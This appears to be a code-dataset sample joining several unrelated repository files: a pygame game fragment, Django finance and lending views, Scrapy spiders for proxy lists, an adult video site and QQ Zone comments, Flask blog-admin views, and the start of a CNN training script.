elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
game_intro(win, display_width, display_height)
def game_intro(win, width, height):
#Game intro which loops with music and goes into game countdown
intro = True
win.blit(startup_image, img_pos)
bg_music.play(loops=-1)
while intro:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
bg_music.stop()
prepare_yourself.play()
pygame.time.delay(1888)
three.play()
pygame.time.delay(788)
two.play()
pygame.time.delay(788)
one.play()
pygame.time.delay(788)
begin.play()
pygame.time.delay(788)
game_loop()
if event.key == pygame.K_ESCAPE:
pygame.quit()
sys.exit()
pygame.display.update()
def game_loop():
#Use this to put the background image to the window and clear start menu
win.blit(bg_image, img_pos)
#Deletes all the keypresses before game start bug
pygame.event.get()
#Change animal for players every game loop and reset position
p1_img, p2_img = change_animal()
x1, y1, x2, y2 = set_position()
pygame.display.update()
running = True
game_over = False
while running:
#Put the animal pictures onto the screen many times after increments!!
win.blit(p1_img, (x1, y1))
win.blit(p2_img, (x2, y2))
pygame.display.update()
if game_over:
if difference < 0:
message = "Player 1"
playersound = 1
elif difference > 0:
message = "Player 2"
playersound = 2
show_victory_screen(message, playersound)
game_over = False
p1_img, p2_img = change_animal()
x1, y1, x2, y2 = set_position()
win.blit(bg_image, img_pos)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_LSHIFT and y1 > finish_line:
y1 -= increment
p1_click.play()
elif event.key == pygame.K_RSHIFT and y2 > finish_line:
y2 -= increment
p2_click.play()
if y1 < finish_line or y2 < finish_line:
difference = y1 - y2
game_over = True
break
game_intro(win, display_width, display_height)
``` |
{
"source": "520MianXiangDuiXiang520/FamilyPropertyManageSystem",
"score": 2
} |
#### File: FamilyPropertyManageSystem/billsManage/views.py
```python
from django.http import JsonResponse, QueryDict
from rest_framework.parsers import JSONParser
from rest_framework.views import APIView
from FamilyPropertyMS.util.Tool import response_detail
from .models import UserBills, FamilyBills
from .MySerializers import BillsSerializer
from abc import abstractmethod
from django.db.models import Sum
from datetime import datetime
class BIllBaseClass:
@staticmethod
def statistical_billing_data(request):
"""
统计账单数据
1. 统计收入支出总数
2. 按具体类型统计
"""
statistical_data = {}
income_data = []
expend_data = []
income_projects = []
income_money = []
expend_projects = []
expend_money = []
all_income = 0
all_expend = 0
income_bills = UserBills.objects.filter(user=request.user, type=0)
expend_bills = UserBills.objects.filter(user=request.user, type=10)
assert income_bills or expend_bills
if income_bills:
all_income = income_bills.aggregate(Sum("money"))['money__sum']
statistical_data.update({'all_income': all_income})
staticmethod_income = income_bills.values('concrete_type'). \
annotate(Sum('money')).values('concrete_type', 'money__sum')
for i in staticmethod_income:
income_projects.append(i['concrete_type'])
income_money.append(i['money__sum'])
statistical_data.update({'income_projects': income_projects})
statistical_data.update({'income_money': income_money})
if expend_bills:
all_expend = expend_bills.aggregate(Sum('money'))['money__sum']
statistical_data.update({'all_expend': all_expend})
staticmethod_expend = expend_bills.values('concrete_type'). \
annotate(Sum('money')).values('concrete_type', 'money__sum')
for i in staticmethod_expend:
expend_projects.append(i['concrete_type'])
expend_money.append(i['money__sum'])
statistical_data.update({'expend_projects': expend_projects})
statistical_data.update({'expend_money': expend_money})
overage = all_income - all_expend
statistical_data.update({'overage': overage})
return statistical_data
def _get_info(self, request, bill_type: int):
income_bill = UserBills.objects.filter(user=request.user, type=bill_type)
bills = BillsSerializer(instance=income_bill, many=True)
return bills.data
@abstractmethod
def get(self, request, *args, **kwargs):
pass
def _post(self, request):
print(request.data)
try:
bills_type = int(request.POST.get('bill_type'))
except TypeError:
return JsonResponse(response_detail(400, detail="类型缺失"))
print(bills_type)
if int(bills_type) not in (0, 1, 10, 11, 12):
return JsonResponse(response_detail(400, detail="类型错误"))
need_fields = ['money', 'remarks', 'time']
for field in need_fields:
if not request.POST.get(field):
return JsonResponse(response_detail(400, detail=f"{field}缺失"))
# 判断用户描述是否超出数据库长度限制
if len(request.POST.get('remarks')) > 1000:
return JsonResponse(response_detail(400, "长度超出数据库限制"))
# 判断金额是否超出限制
if int(request.POST.get('money')) > 9999999:
return JsonResponse(response_detail(400, "金额超出限制"))
# 加入到数据库
try:
field_time = datetime.strptime(request.POST['time'], '%Y-%m-%d %H:%M:%S')
except ValueError:
return JsonResponse(response_detail(400, '时间格式有误,应为 %Y-%m-%d %H:%M:%S'))
if request.POST.get('concrete_type'):
new_field = UserBills(user=request.user, money=request.POST['money'],
type=bills_type, time=field_time, remarks=request.POST['remarks'],
concrete_type=request.POST['concrete_type'])
else:
new_field = UserBills(user=request.user, money=request.POST['money'],
type=bills_type, time=field_time, remarks=request.POST['remarks'])
new_field.save()
# 如果用户有家庭,并且 is_add_to_family = 1, 就把该账单加入到家庭账单
print(request.user.family1)
if request.user.family1:
if int(request.POST.get('is_add_to_family')) == 1:
new_family_bill = FamilyBills(family_id=request.user.family1, bills_id=new_field)
new_family_bill.save()
data = self.statistical_billing_data(request)
result = response_detail(200, data=data)
return JsonResponse(result)
def _put(self, request, bill_type: int):
PUT = QueryDict(request.body)
put_data = PUT.dict()
need_field = ('bill_id', 'field_name', 'new_value')
# 检查request中是否包含所需要的字段
for field in need_field:
if field not in put_data:
return JsonResponse(response_detail(400, detail="参数缺失"))
# 检查每一个参数的正确性
bill = UserBills.objects.filter(id=int(put_data['bill_id']),
type=bill_type, user=request.user).first()
if not bill:
return JsonResponse(response_detail(400, detail="账单不存在"))
if not getattr(UserBills, put_data['field_name'], None):
return JsonResponse(response_detail(400, detail="参数错误(field_name is not find)"))
try:
setattr(bill, put_data['field_name'], put_data['new_value'])
bill.save()
data = self._get_info(request, bill_type)
return JsonResponse(response_detail(200, data=data))
except Exception:
return JsonResponse(response_detail(500, detail="修改失败"))
class ExpendView(APIView, BIllBaseClass):
# 支出视图
def get(self, request, *args, **kwargs):
income_bill = UserBills.objects.filter(user=request.user, type=10)
bills = BillsSerializer(instance=income_bill, many=True)
return JsonResponse(response_detail(200, data=bills.data), safe=False)
def post(self, request, *args, **kwargs):
return self._post(request)
def put(self, request, *args, **kwargs):
return self._put(request, bill_type=10)
class IncomeView(APIView, BIllBaseClass):
# 收入视图
def get(self, request, *args, **kwargs):
income_bill = UserBills.objects.filter(user=request.user, type=0)
bills = BillsSerializer(instance=income_bill, many=True)
return JsonResponse(response_detail(200, data=bills.data), safe=False)
def post(self, request, *args, **kwargs):
return self._post(request)
def put(self, request, *args, **kwargs):
return self._put(request, bill_type=0)
class StatisticsView(APIView, BIllBaseClass):
def get(self, request, *args, **kwargs):
try:
data = self.statistical_billing_data(request)
except AssertionError:
return JsonResponse(response_detail(201))
return JsonResponse(response_detail(200, data=data))
class BankSavingsView(APIView):
pass
```
#### File: FamilyPropertyManageSystem/borrowingMoneyManagement/views.py
```python
from datetime import datetime
from django.http import JsonResponse, QueryDict
from rest_framework.views import APIView
from FamilyPropertyMS.util.Tool import response_detail, send_message
from .MySerializers import BorrowSerializer
from .models import BorrowMoneyTable
from userManage.models import User
from billsManage.models import UserBills
class BorrowingView(APIView):
def post(self, request, *args, **kwargs):
"""
发起借钱请求, 需要三个字段(向谁借who, 借多少money,什么时候还pay_back_date)
"""
need_fields = ('who', 'money', 'pay_back_date')
for field in need_fields:
if not request.POST.get(field):
return JsonResponse(response_detail(400, f"{field}缺失"))
who = int(request.POST.get('who'))
money = int(request.POST.get('money'))
pay_back_date = str(request.POST.get('pay_back_date'))
try:
who = User.objects.get(id=who)
except:
return JsonResponse(response_detail(400, "请求失败!用户不存在!"))
if money < 0:
return JsonResponse(response_detail(400, "请求失败!金额应该大于0"))
try:
field_time = datetime.strptime(pay_back_date, '%Y-%m-%d')
except ValueError:
return JsonResponse(response_detail(400, '时间格式有误,应为 %Y-%m-%d'))
borrow_field = BorrowMoneyTable(borrower=request.user,
lender=who,
money=money,
repayment_date=field_time,
status=0)
borrow_field.save()
send_message(request.user, who, "借钱信息", f"{request.user.username} 想向你借 {money}"
f"块钱,还款时间是: {field_time}, 是否同意?\n记录号:【{borrow_field.id}】", 3)
return JsonResponse(response_detail(200))
def put(self, request):
"""
处理借钱请求,需要两个字段(是否同意【is_agree】 1代表不同意, 0代表同意, 借钱记录号【borrow_id】)
"""
need_fields = ('is_agree', 'borrow_id')
PUT = QueryDict(request.body)
put_data = PUT.dict()
for field in need_fields:
if not put_data.get(field):
return JsonResponse(response_detail(400, f"{field}缺失!"))
is_agree = int(put_data['is_agree'])
borrow_id = int(put_data['borrow_id'])
if is_agree not in (0, 1):
return JsonResponse(response_detail(400, "参数错误!"))
try:
borrow_field = BorrowMoneyTable.objects.filter(id=borrow_id).first()
except:
return JsonResponse(response_detail(400, "记录不存在或过期!"))
if not borrow_field:
return JsonResponse(response_detail(400, '请求不存在'))
if borrow_field.status != 0:
return JsonResponse(response_detail(400, "已处理"))
if is_agree == 1:
send_message(request.user, borrow_field.borrower, "借款申请结果",
f"{request.user.username} 不同意您的借款申请", 1)
borrow_field.delete()
return JsonResponse(response_detail(200))
send_message(request.user, borrow_field.borrower, "借款申请结果",
f"{request.user.username} 同意了您的借款申请", 1)
bill_lender = UserBills(user=request.user, money=borrow_field.money,
type=10, concrete_type="外借",
remarks=f"{borrow_field.date} 借给 {borrow_field.borrower.username},"
f" 还款日期: {borrow_field.repayment_date}")
bill_lender.save()
bill_borrower = UserBills(user=borrow_field.borrower, money=borrow_field.money,
type=0, concrete_type="借款",
remarks=f"{borrow_field.date} 向 {borrow_field.lender.username} 借的。"
f"还款日期: {borrow_field.repayment_date}")
bill_borrower.save()
borrow_field.status = 1
borrow_field.save()
return JsonResponse(response_detail(200))
class PayBackView(APIView):
"""
还钱(给谁还,还多少)
"""
def get(self, request, *args, **kwargs):
"""
返回用户所有借的帐
"""
borrow_bills = BorrowMoneyTable.objects.filter(borrower=request.user)
if not borrow_bills:
return JsonResponse(response_detail(201))
borrow_data = BorrowSerializer(instance=borrow_bills, many=True)
return JsonResponse(response_detail(200, data=borrow_data.data), safe=False)
def post(self, request, *args, **kwargs):
need_fields = ('who', 'money', 'bill_id')
for field in need_fields:
if not request.POST.get(field):
return JsonResponse(response_detail(400, f"{field} 缺失!"))
who_id = int(request.POST.get('who'))
money = int(request.POST.get('money'))
bill_id = int(request.POST.get('bill_id'))
who = User.objects.filter(id=who_id).first()
if not who:
return JsonResponse(response_detail(400, "用户不存在!"))
if money <= 0:
return JsonResponse(response_detail(400, "还款金额不能小于等于0"))
# 校验通过后,首先删除或修改借还款数据表中的内容,添加双方账单,再给用户发消息
borrow_bill = BorrowMoneyTable.objects.filter(borrower=request.user,
lender=who, id=bill_id).order_by('-money').first()
if not borrow_bill:
return JsonResponse(response_detail(400, "借款记录不存在"))
if borrow_bill.money < money:
return JsonResponse(response_detail(400, "金额超过欠账金额!"))
# TODO:一次性还清所有帐
borrow_bill.money -= money
if borrow_bill.money == 0:
borrow_bill.delete()
else:
borrow_bill.save()
bill_borrower = UserBills(user=request.user, money=money,
type=10, concrete_type="还款",
remarks=f"给{who.username} 还款!")
bill_borrower.save()
bill_lender = UserBills(user=who, money=money,
type=0, concrete_type="借款收回",
remarks=f"来自{request.user}的还款")
bill_lender.save()
send_message(request.user, who, "还钱啦", f"欠你的钱给你还了啊!金额:{money}元", 0)
return JsonResponse(response_detail(200))
```
#### File: FamilyPropertyMS/util/MyAuthentication.py
```python
import pytz
from rest_framework.exceptions import APIException
from rest_framework.authentication import BaseAuthentication
from .Tool import timeout_judgment
from userManage import models
import datetime
class MyAuthentication(BaseAuthentication):
@staticmethod
def _delete_token(token_field):
token_field.delete()
def authenticate(self, request):
token = request.GET.get('token')
token_field = models.UserToken.objects.filter(token=token).first()
if not token_field:
raise APIException("认证失败(no token)")
else:
if timeout_judgment(token_field, 'create_time', '15/m'):
self._delete_token(token_field)
raise APIException("认证失败(token timeout)")
user = models.User.objects.filter(id=token_field.user_id).first()
token_field.create_time = datetime.datetime.now(tz=pytz.timezone('UTC'))
token_field.save()
return user, token_field
```
#### File: FamilyPropertyMS/util/Tool.py
```python
import datetime
from copy import copy
import pytz
from django.http import JsonResponse
from FamilyPropertyMS.util.ResponseCode import CODE
from messageManage.models import Message
from userManage.models import User
class ToolException(Exception):
pass
def timeout_judgment(field, attr: str, time_line: str):
"""
判断从数据表中某个时间类型的字段有没有超时,超时返回True
:param field: extends Model: Model对象
:param attr: str: 时间类型的字段名
:param time_line: str: 超时时间,比如表示3小时超时,应设置为(3/h)
:return: bool
"""
num, period = time_line.split('/')
db_time = getattr(field, attr)
delta = (datetime.datetime.now(tz=pytz.timezone('UTC')).replace(tzinfo=pytz.timezone('UTC'))
- db_time.replace(tzinfo=pytz.timezone('UTC')))
return delta.seconds > {'s': 1, 'm': 60, 'h': 3600, 'd': 86400}[period] * int(num)
def send_message(send: User, receive: User, title: str, text: str, m_type: int):
"""
发送一条消息
:param send: 发送者
:param receive: 接收者
:param title: 消息标题
:param text: 消息正文
:param m_type: 消息类型(0为普通用户消息, 1为系统通知消息, 2为请求确认类消息)
2类消息在前端渲染时需要渲染一个form
"""
try:
new_message = Message(send=send, receive=receive, title=title, text=text, type=m_type)
new_message.save()
except:
return JsonResponse(CODE[500])
def response_detail(status: int, detail: str = None, data=None) -> dict:
try:
code = copy(CODE[status])
except KeyError:
raise ToolException("code必须在ResponseCode.py中存在")
if detail:
code['msg'] = detail
if data:
code['data'] = data
return code
``` |
{
"source": "520MianXiangDuiXiang520/JuneGoBlog",
"score": 3
} |
#### File: 520MianXiangDuiXiang520/JuneGoBlog/code_tool.py
```python
import re
import sys
Public = 1
Private = 2
def f_text(text: str, obj) -> str:
flags = [flag.replace("%", "") for flag in re.findall(r"%[a-z][a-zA-Z]*%", text)]
flags_tuple = tuple(flags)
assert len(flags_tuple) == len(flags), "【Error】 Parameters with duplicate names"
for flag in flags:
v = getattr(obj, flag)
text = text.replace(f"%{flag}%", v, 1)
return text
class ToolException(Exception):
pass
class CodeTool:
def __init__(self, path: str):
self._aip_path = path
routes = self._aip_path.split("/")
if len(routes) < 2 or routes[0] != "api":
raise ToolException("api format does not meet the specification !")
self.routes = routes
@staticmethod
def get_func_name(routes: [str], name_type: int, suffix: str) -> str:
prefix = routes[1]
if name_type == Public:
prefix = prefix.title()
for r in routes[2:]:
prefix += r.title()
return prefix + suffix
def _get_route_func_name(self):
self.route = self.get_func_name(self.routes, Private, "Routes")
def _get_check_func_name(self):
self.check = self.get_func_name(self.routes, Public, "Check")
def _get_server_func_name(self):
self.server = self.get_func_name(self.routes, Public, "Logic")
def _get_req_name(self):
self.req = self.get_func_name(self.routes, Public, "Req")
def _get_resp_name(self):
self.resp = self.get_func_name(self.routes, Public, "Resp")
def _set_route(self):
func = """
func %route%() []gin.HandlerFunc {
return []gin.HandlerFunc{
junebao_top.EasyHandler(check.%check%,
server.%server%, message.%req%{}),
}
}"""
func = f_text(func, self)
with open(f"./src/routes/{self.routes[1]}.go", "a+") as fp:
fp.write(func)
def _set_server(self):
func = """
func %server%(ctx *gin.Context, req junebaotop.BaseReqInter) junebaotop.BaseRespInter {
request := req.(*message.%req%)
resp := message.%resp%{}
// TODO:...
log.Println(request)
resp.Header = junebaotop.SuccessRespHeader
return resp
}"""
func = f_text(func, self)
with open(f"./src/server/{self.routes[1]}.go", "a+") as fp:
fp.write(func)
def _set_check(self):
func = """
func %check%(ctx *gin.Context, req junebao_top.BaseReqInter) (junebao_top.BaseRespInter, error) {
request := req.(*message.%req%)
//TODO:...
return http.StatusOK, nil
}"""
func = f_text(func, self)
with open(f"./src/check/{self.routes[1]}.go", "a+") as fp:
fp.write(func)
def _set_message(self):
func = """
type %resp% struct {
Header junebao_top.BaseRespHeader `json:"header"`
}
type %req% struct {
}
func (r %req%) JSON(ctx *gin.Context) error {
return ctx.ShouldBindJSON(&r)
}"""
func = f_text(func, self)
with open(f"./src/message/{self.routes[1]}.go", "a+") as fp:
fp.write(func)
# api/server/list
def do(self):
self._get_route_func_name()
self._get_check_func_name()
self._get_server_func_name()
self._get_req_name()
self._get_resp_name()
self._set_route()
self._set_server()
self._set_check()
self._set_message()
if __name__ == '__main__':
path = sys.argv[1]
ct = CodeTool(path)
ct.do()
``` |
{
"source": "521274311/pyeasytd",
"score": 3
} |
#### File: pyeasytd/entries/json_easy.py
```python
from .__init__ import *
class JsonEasyEntry:
'''
基于json模型封装实体,适用于规则的多层嵌套json读取
'''
__level_prefix = 'level_'
__init_load_status = False
__json = None
__json_text = None
__struct = None
__count = None
def __init__(self, data: str or dict or list or bytes or bytearray):
import json
if type(data) in (str,):
self.__json = json.loads(data)
self.__json_text = data
elif type(data) in (dict, list, tuple):
self.__json = data
self.__json_text = json.dumps(data)
self.__struct = {}
self.__count = {}
def print(self):
'''
输出包含所有结构的json
:return:
'''
import json
self.__init_load()
print(json.dumps(self.__struct))
def get(self, key, level: int=None):
'''
获取某个key的结果
:param key: 字典的key
:param level: 层级,第一级从0开始,查找指定层级,为None时不限制层级
:return: list,对应key的结果列表(可能包含多个同名key)
'''
self.__init_load()
if BasicCheckUtil.is_none(level):
result_list = []
for level_key, value in self.__struct.items():
if BasicCheckUtil.non_none(value.get(key)):
result_list += value[key]
return result_list
level_key = self.__level_prefix + str(level)
return self.__struct[level_key][key]
def get_first(self, key, level: int=None):
'''
获取某个key的第一个结果
:param key: 字典的key
:param level: 层级,第一级从0开始,查找指定层级,为None时不限制层级
:return: list的第一个元素
'''
return self.get_one(key, 0, level)
def get_last(self, key, level: int=None):
'''
获取某个key的最后一个结果
:param key: 字典的key
:param level: 层级,第一级从0开始,查找指定层级,为None时不限制层级
:return: list的最后一个元素
'''
if BasicCheckUtil.is_none(level):
total = 0
for level_key, value in self.__count.items():
if BasicCheckUtil.non_none(value.get(key)):
total += value[key]
return self.get_one(key, total - 1, level)
level_key = self.__level_prefix + str(level)
return self.get_one(key, self.__count[level_key][key] - 1, level)
def get_one(self, key, index=0, level: int=None):
'''
获取某个key的指定位置结果
:param key: 字典的key
:param index: 第 index 次出现
:param level: 层级,第一级从0开始,查找指定层级,为None时不限制层级
:return: list 的第 index个元素,从0开始
'''
self.__init_load()
if BasicCheckUtil.is_none(level):
result_list = []
for level_key, value in self.__struct.items():
if BasicCheckUtil.non_none(value.get(key)):
result_list += value[key]
if len(result_list) > index:
return result_list[index]
return result_list[index]
level_key = self.__level_prefix + str(level)
return self.__struct[level_key][key][index]
def get_original_json(self):
'''
获取原始传入dict对象
:return:dict
'''
return self.__json
def get_original_json_text(self):
'''
获取原始传入json字符串
:return: str
'''
return self.__json_text
def __init_load(self):
'''
装载dict对象
:return:
'''
if not self.__init_load_status:
if self.__json is None:
return ValueError('当前没有Json对象')
self.__re_init_load(self.__json)
self.__init_load_status = True
def __re_init_load(self, param, level=0):
'''
提取嵌套dict至最外层
:param param:
:return:
'''
level_key = self.__level_prefix + str(level)
if BasicCheckUtil.is_none(self.__struct.get(level_key)):
self.__struct[level_key] = {}
self.__count[level_key] = {}
if type(param) in (dict,):
for key, value in param.items():
count = self.__count[level_key].get(key)
if count is None:
count = 0
self.__struct[level_key][key] = []
self.__struct[level_key][key].insert(count, value)
count += 1
self.__count[level_key][key] = count
self.__re_init_load(value, level + 1)
elif type(param) in (list, tuple):
for single in param:
self.__re_init_load(single, level + 1)
``` |
{
"source": "5218664b/proxy_pool",
"score": 2
} |
#### File: proxy_pool/DB/DbClient.py
```python
__author__ = 'JHao'
import os
import sys
from Config.ConfigGetter import config
from Util.utilClass import Singleton
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
class DbClient(object):
"""
DbClient DB工厂类 提供get/put/pop/delete/getAll/changeTable方法
目前存放代理的table/collection/hash有两种:
raw_proxy: 存放原始的代理;
useful_proxy_queue: 存放检验后的代理;
抽象方法定义:
get(proxy): 返回proxy的信息;
put(proxy): 存入一个代理;
pop(): 弹出一个代理
exists(proxy): 判断代理是否存在
getNumber(raw_proxy): 返回代理总数(一个计数器);
update(proxy, num): 修改代理属性计数器的值;
delete(proxy): 删除指定代理;
getAll(): 返回所有代理;
changeTable(name): 切换 table or collection or hash;
所有方法需要相应类去具体实现:
SSDB:SsdbClient.py
REDIS:RedisClient.py 停用 统一使用SsdbClient.py
"""
__metaclass__ = Singleton
def __init__(self):
"""
init
:return:
"""
self.__initDbClient()
def __initDbClient(self):
"""
init DB Client
:return:
"""
__type = None
if "SSDB" == config.db_type:
__type = "SsdbClient"
elif "REDIS" == config.db_type:
__type = "SsdbClient"
elif "MONGODB" == config.db_type:
__type = "MongodbClient"
else:
pass
assert __type, 'type error, Not support DB type: {}'.format(config.db_type)
self.client = getattr(__import__(__type), __type)(name=config.db_name,
host=config.db_host,
port=config.db_port,
password=config.db_password)
def get(self, key, **kwargs):
return self.client.get(key, **kwargs)
def put(self, key, **kwargs):
return self.client.put(key, **kwargs)
def update(self, key, value, **kwargs):
return self.client.update(key, value, **kwargs)
def delete(self, key, **kwargs):
return self.client.delete(key, **kwargs)
def exists(self, key, **kwargs):
return self.client.exists(key, **kwargs)
def pop(self, **kwargs):
return self.client.pop(**kwargs)
def getAll(self):
return self.client.getAll()
def getAllUserAgent(self):
return self.client.getAllUserAgent()
def changeTable(self, name):
self.client.changeTable(name)
def getNumber(self):
return self.client.getNumber()
if __name__ == "__main__":
account = DbClient()
account.changeTable('useful_proxy')
print(account.pop())
``` |
{
"source": "5218664b/WebCrawler",
"score": 3
} |
#### File: pornhub/spiders/porn.py
```python
import scrapy
import json
import re
import sys
import requests
from pornhub.items import PornhubItem
'''
python 2.7
pip install --user PyQt4-4.11.4-cp27-cp27m-win_amd64.whl
pip install Ghost.py
'''
# D:/ProgramData/Anaconda3/Scripts/activate.bat erdianqi
# scrapy crawl porn -o porn.json -s FEED_EXPORT_ENCODING=utf-8
class PornSpider(scrapy.Spider):
def __init__(self):
self.webkit_session = None
name = 'porn'
start_urls = ['www.baidu.com']
fileName = 'pornhub.links'
searchKey = 'japanese'
def start_requests(self):
currentPageNum = 1
endPageNum = 1
while currentPageNum <= endPageNum:
url = 'https://www.pornhub.com/video/search?search=' + self.searchKey + '&page=' + str(currentPageNum)
#url = 'https://jp.pornhub.com/video'
yield scrapy.Request(
url,
callback=self.parse_search_result,
headers={
'Cookie' : 'bs=p6za8azsjwg9ijyn970f8vgx3ehieuc4; ss=430400793297104506; ua=db71e63d841d64be86149f315e465d5f; platform_cookie_reset=pc; platform=pc; RNKEY=1447123*1687583:3567443335:1032885732:1; RNLBSERVERID=ded6942',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
}
)
currentPageNum = currentPageNum + 1
def parse_search_result(self,response):
links = response.xpath('//div[@class="img fade fadeUp videoPreviewBg"]/a')
for link in links:
url = 'https://www.pornhub.com' + str(link.xpath('@href').extract())[3:-2]
yield scrapy.Request(
url,
callback=self.parse_video_link
)
def parse_video_link(self, response):
find_quality = ['quality_1080p', 'quality_720p', 'quality_480p', 'quality_240p']
for quality in find_quality:
video_url = self.webkit_session.evaluate(quality)
if video_url[0] is not None:
break
pornhubItem = PornhubItem()
pornhubItem['url'] = response.url
pornhubItem['title'] = response.xpath('@title').extract()
pornhubItem['videoUrl'] = str(video_url[0])
yield pornhubItem
with open(self.fileName,'a') as f:
f.write(pornhubItem['videoUrl']+ '\n')
```
#### File: qzonespider/spiders/comment.py
```python
import scrapy
import os
import json
import re
import sys
import requests
from qzonespider.items import QzonespiderItem
from scrapy.conf import settings
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
import json
#scrapy crawl comment -o comment.json -s FEED_EXPORT_ENCODING=utf-8
class CommentSpider(scrapy.Spider):
def __init__(self, *args, **kwargs):
super(CommentSpider, self).__init__(**kwargs)
self.cookieStr = args[0]['cookie']
self.gtk = args[0]['gtk']
name = 'comment'
allowed_domains = ['qq.com']
start_urls = ['https://user.qzone.qq.com/1141802674']
#账号
account = '1141802674'
def parse(self, response):
url = 'https://user.qzone.qq.com/proxy/domain/m.qzone.qq.com/cgi-bin/new/get_msgb\
?uin=%s&hostUin=%s&num=10&start=1&inCharset=utf-8&outCharset=utf-8&format=jsonp&g_tk=%s' % (self.account, self.account,self.gtk)
yield scrapy.Request(
url
,method='GET'
,callback=self.request_comment
,cookies=self.cookieStr
)
def request_comment(self, response):
json_body = json.loads(str(response.text)[10:-2])['data']
comment_total = int(json_body['total'])
for index in range(comment_total/10+1):
url = 'https://user.qzone.qq.com/proxy/domain/m.qzone.qq.com/cgi-bin/new/get_msgb\
?uin=%s&hostUin=%s&num=10&start=%s&inCharset=utf-8&outCharset=utf-8&format=jsonp&g_tk=%s' % (self.account, self.account, index*10, self.gtk)
yield scrapy.Request(
url
,method='GET'
,callback=self.parse_comment
,cookies=self.cookieStr
)
def parse_comment(self, response):
json_body = json.loads(str(response.text)[10:-2])['data']
commentItems = QzonespiderItem()
commentItems['comment'] = json_body['commentList']
yield commentItems
``` |
{
"source": "521xueweihan/IPProxyTool",
"score": 2
} |
#### File: spiders/proxy/xicidaili.py
```python
from proxy import Proxy
from basespider import BaseSpider
from scrapy.selector import Selector
class XiCiDaiLiSpider(BaseSpider):
name = 'xici'
def __init__(self, *a, **kw):
super(XiCiDaiLiSpider, self).__init__(*a, **kw)
self.urls = ['http://www.xicidaili.com/nn/%s' % n for n in range(1, 2)]
self.headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.5',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Host': 'www.xicidaili.com',
'If-None-Match': 'W/"cb655e834a031d9237e3c33f3499bd34"',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0',
}
self.init()
def parse_page(self, response):
sel = Selector(text = response.body)
infos = sel.xpath('//tr[@class="odd"]').extract()
for info in infos:
val = Selector(text = info)
ip = val.xpath('//td[2]/text()').extract_first()
port = val.xpath('//td[3]/text()').extract_first()
country = val.xpath('//td[4]/a/text()').extract_first()
anonymity = val.xpath('//td[5]/text()').extract_first()
https = val.xpath('//td[6]/text()').extract_first()
proxy = Proxy()
proxy.set_value(
ip = ip,
port = port,
country = country,
anonymity = anonymity,
https = 'no',
speed = 1,
source = self.name,
)
self.add_proxy(proxy = proxy)
```
#### File: spiders/validator/httpbin.py
```python
from validator import Validator
class HttpBinSpider(Validator):
name = 'httpbin'
def __init__(self, name = None, **kwargs):
super(HttpBinSpider, self).__init__(name, **kwargs)
self.timeout = 5
self.urls = [
'http://httpbin.org/get'
]
self.init()
``` |
{
"source": "521xueweihan/pyhub",
"score": 2
} |
#### File: pyhub/views/__init__.py
```python
import functools
from flask import session, abort, render_template
from config import PASSWORD
from server import app
def login(f):
@functools.wraps(f)
def warp_fun(*args, **kwargs):
if PASSWORD != session.get('password'):
abort(404)
else:
return f(*args, **kwargs)
return warp_fun
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
```
#### File: pyhub/views/manage.py
```python
import uuid
from datetime import datetime
from peewee import IntegrityError
from flask import render_template, redirect, request, flash, abort
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import InputRequired, URL
from wtforms.widgets import TextArea
from models.blog import Blog
from pyhub import app, logger
from views import login
class BlogForm(FlaskForm):
name = StringField('name', validators=[InputRequired()])
url = StringField('url', validators=[URL()])
description = StringField('description', widget=TextArea())
@app.route('/manage/')
@login
def manage():
all_blog = Blog.select().order_by(Blog.create_time.desc())
form = BlogForm()
logger.info('%s|request manage page' % request.remote_addr)
return render_template('manage.html', blogs=all_blog, form=form)
@app.route('/manage/create/', methods=['POST'])
@login
def create():
form = BlogForm()
if form.validate_on_submit():
try:
blog = Blog.create(
blog_id=uuid.uuid4(), name=form.name.data, url=form.url.data,
description=form.description.data)
flash(u'创建 {name} 成功'.format(name=blog.name))
except IntegrityError:
flash(u'创建 {name} 失败,该条目已存在'.format(name=form.name.data), 'error')
else:
flash(u'创建失败,参数错误', 'error')
return redirect('/manage')
@app.route('/manage/update/<blog_id>', methods=['GET', 'POST'])
@login
def update(blog_id):
blog = Blog.get(Blog.blog_id == blog_id)
if not blog:
abort(400)
form = BlogForm(name=blog.name, url=blog.url, description=blog.description)
if request.method == 'GET':
return render_template('update.html', blog=blog, form=form)
else:
if form.validate_on_submit():
try:
blog.name = form.name.data
blog.url = form.url.data
blog.description = form.description.data
blog.update_time = datetime.now()
blog.save()
flash(u'更新 {name} 成功'.format(name=form.name.data))
return redirect('/manage')
except IntegrityError:
flash(u'更新 {name} 失败,该条目已存在'.format(name=form.name.data), 'error')
return render_template('update.html', blog=blog, form=form)
else:
flash(u'更新失败,参数错误', 'error')
return render_template('update.html', blog=blog, form=form)
@app.route('/manage/status/<blog_id>', methods=['GET'])
@login
def status(blog_id):
blog = Blog.get(Blog.blog_id == blog_id)
if not blog:
abort(400)
if blog.status:
blog.status = 0
flash(u'{name}下线成功'.format(name=blog.name))
else:
blog.status = 1
flash(u'{name}上线成功'.format(name=blog.name))
blog.update_time = datetime.now()
blog.save()
return redirect('/manage')
``` |
{
"source": "5220243/taili_code_case",
"score": 3
} |
#### File: 5220243/taili_code_case/CNN_train.py
```python
import numpy as np
import tensorflow as tf
import logging
from CNN_input import read_dataset
logging.basicConfig(format='%(levelname)s:%(asctime)s %(message)s', level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
DATASET_DIR = r'C:\Users\PycharmProjects\Cifar'
